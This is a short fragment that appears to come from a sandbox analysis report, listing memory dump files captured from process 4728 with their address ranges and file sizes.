10.8MB
-
memory/4728-48-0x00007FF9C7C00000-0x00007FF9C86C1000-memory.dmp
Filesize
10.8MB
-
memory/4728-1-0x00000241F30B0000-0x00000241F30D2000-memory.dmp
Filesize
136KB
-
memory/4728-12-0x00000241F3120000-0x00000241F3130000-memory.dmp
Filesize
64KB